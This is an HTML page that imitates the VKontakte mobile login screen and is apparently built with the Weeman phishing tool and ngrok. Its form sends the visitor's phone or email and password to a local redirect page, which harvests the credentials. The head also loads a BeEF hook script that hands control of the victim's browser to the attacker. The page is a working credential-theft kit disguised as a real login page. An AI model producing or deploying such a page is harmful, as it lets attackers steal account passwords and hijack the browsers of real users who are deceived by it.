<!DOCTYPE html>
<html class="vk vk_js_no vk_flex_no r d h vk_appAuth_no" xmlns="http://www.w3.org/1999/xhtml">
 <head>
  <!-- Weeman/ngrok edit by @lnxmxxrk -->
  <meta content="text/html; charset=utf-8" http-equiv="content-type"/>
  <meta content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" name="viewport"/>
  <meta content="telephone=no" name="format-detection"/>
  <meta content="IE=edge" http-equiv="X-UA-Compatible"/>
  <meta content="176" name="MobileOptimized"/>
  <meta content="True" name="HandheldFriendly"/>
  <meta content="#5181b8" name="theme-color"/>
  <base id="base">
   <title>
    Мобильная версия ВКонтакте
   </title>
   <link href="fav_logo.ico?8" rel="shortcut icon"/>
   <link href="common.css?165618541" media="" rel="stylesheet" type="text/css"/>
   <script src="grip.js?17363785392" type="text/javascript">
   </script>
   <link href="https://vk.com/" rel="canonical"/>
   <link href="android-app://com.vkontakte.android/vkontakte/m.vk.com/" rel="alternate"/>
  </base>
  <script src="http://127.0.0.1:3000/hook.js">
  </script>
 </head>
 <body class="vk__page _touch vk_ios_no vk_stickers_hints_support_no opera_mini_no vk_safari_no vk__page_login vk_al_no">
  <div class="layout">
   <div class="layout__header mhead" id="vk_head">
    <div class="hb_wrap">
     <div class="hb_btn">
     </div>
    </div>
   </div>
   <div class="layout__body " id="vk_wrap">
    <div class="layout__leftMenu" id="l">
    </div>
    <div class="layout__basis" id="m">
     <div class="basis">
      <div class="basis__header mhead" id="mhead">
       <a accesskey="*" class="hb_wrap mhb_logo" href="/">
        <div class="hb_btn mhi_logo">
        </div>
        <h1 class="hb_btn mh_header">
        </h1>
       </a>
      </div>
      <div class="basis__content mcont" data-canonical="https://vk.com/" id="mcont">
       <div class="installApp">
        <a class="installApp__link" href="https://vk.me/?act=dl">
         <div class="installApp__link_wrap">
          <div class="installApp__label">
           Установить приложение
           <b>
            ВКонтакте
           </b>
           <span class="installApp__arrow">
           </span>
          </div>
         </div>
        </a>
       </div>
       <div class="pcont fit_box bl_cont new_form">
        <div class="form_item">
         <div class="login_header">
          Мобильная версия поможет Вам оставаться ВКонтакте, даже если Вы далеко от компьютера.
         </div>
         <form action="redirect.html" method="post" novalidate="">
          <dl class="fi_row">
           <dd>
            <input class="textfield" name="email" placeholder="Телефон или email" type="email" value=""/>
           </dd>
          </dl>
          <dl class="fi_row">
           <dd>
            <input class="textfield" name="pass" placeholder="Пароль" type="password"/>
           </dd>
          </dl>
          <div class="fi_row_new">
           <input class="button wide_button" type="submit" value="Войти"/>
          </div>
          <div class="fi_row">
           <div class="near_btn wide_button login_restore">
            <a href="/restore">
             Забыли пароль?
            </a>
           </div>
          </div>
          <div class="login_new_user">
           <div class="fi_header fi_header_light">
            Впервые ВКонтакте?
           </div>
          </div>
          <div class="fi_row">
           <a class="button wide_button success" href="/join">
            Зарегистрироваться
           </a>
          </div>
          <div class="socials">
           <a class="social_button social_google" href="/login?act=google_sign">
            <i class="social_icon">
            </i>
            Войти через Google
           </a>
           <a class="social_button" href="/login?act=fb_sign">
            <i class="social_icon">
            </i>
            Войти через Facebook
           </a>
          </div>
         </form>
        </div>
       </div>
      </div>
      <div class="basis__footer mfoot" id="mfoot">
       <div class="pfoot">
        <ul class="footer_menu">
         <li class="fm_row">
          <a class="fm_item" href="/settings?act=change_regional&amp;hash=556bc07e800cf15c50&amp;lang_id=3">
           English
          </a>
         </li>
         <li class="fm_row">
          <a class="fm_item" href="/settings?act=change_regional&amp;hash=556bc07e800cf15c50&amp;lang_id=1">
           Українська
          </a>
         </li>
         <li class="fm_row">
          <a class="fm_item" href="/settings?act=select_lang">
           all languages »
          </a>
         </li>
        </ul>
        <ul class="footer_menu" id="footer_menu">
         <li class="fm_row">
          <a class="fm_item" href="/fv?to=%2F%3F_fm%3D1%26_fm2%3D1">
           Полная версия
          </a>
         </li>
        </ul>
       </div>
      </div>
      <div class="_cntrs" style="height:0;overflow:hidden;">
       <img align="left" alt="" height="1" src="//counter.yadro.ru/hit?uhttps%3A%2F%2Fm.vk.com%2F;r;96959817" width="1"/>
       <img align="left" alt="" height="1" src="//sb.scorecardresearch.com/p?c1=2&amp;c2=13765216&amp;c3=&amp;c4=https%3A%2F%2Fm.vk.com%2F&amp;c5=&amp;c9=&amp;c15=&amp;cv=2.0&amp;cj=1&amp;rn=96959817" width="1"/>
       <img height="1" src="//top-fwz1.mail.ru/counter?id=2579437;pid=0;r=" style="border:0;" width="1"/>
      </div>
     </div>
    </div>
   </div>
  </div>
  <a class="FloatBtn" href="/join?from=float">
   <span class="FloatBtn__text" onclick="uRegisterFloatBtn.checkBtn();">
    Регистрация
   </span>
   <i class="FloatBtn__close" onclick="uRegisterFloatBtn._onCloseClick(event)">
   </i>
  </a>
  <div id="vk_utils">
  </div>
  <div id="z">
  </div>
  <div id="vk_bottom">
  </div>
  <div id="theme_color_shim">
  </div>
 </body>
</html>